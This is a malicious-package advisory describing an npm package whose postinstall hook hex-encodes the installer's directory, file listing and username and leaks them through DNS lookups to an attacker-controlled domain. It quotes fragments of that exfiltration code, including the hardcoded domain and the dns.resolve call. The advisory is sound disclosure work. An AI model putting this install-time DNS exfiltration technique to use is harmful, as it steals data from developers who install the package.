MAL-2026-5735

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (8fc720cd970f4d19212ca90945b7fc1e4e1c64da98235ff595b3792ae69e3e68) On `npm install`, this package's postinstall hook (`node index.js`) hex-encodes the installer's current working directory, the first 15 entries of that directory, and `os.userInfo().username`, and leaks each chunk via DNS A-record lookups to subdomains of the attacker-controlled domain `uqlyosvp1f9.oob.evilsec.xyz`. The hardcoded out-of-band domain is bound at index.js line 1 (`const D = "uqlyosvp1f9.oob.evilsec.xyz"`) and index.js line 8 calls `dns.resolve(`${chunk}.${tag}${i}.${D}`, 'A',...)` to transmit the encoded data. DNS-subdomain encoding is a well-known technique to evade HTTP egress filtering. The package metadata (description "RSI package!", anonymous author, release-candidate version) provides no legitimate purpose that would justify reading installer filesystem and identity at install time.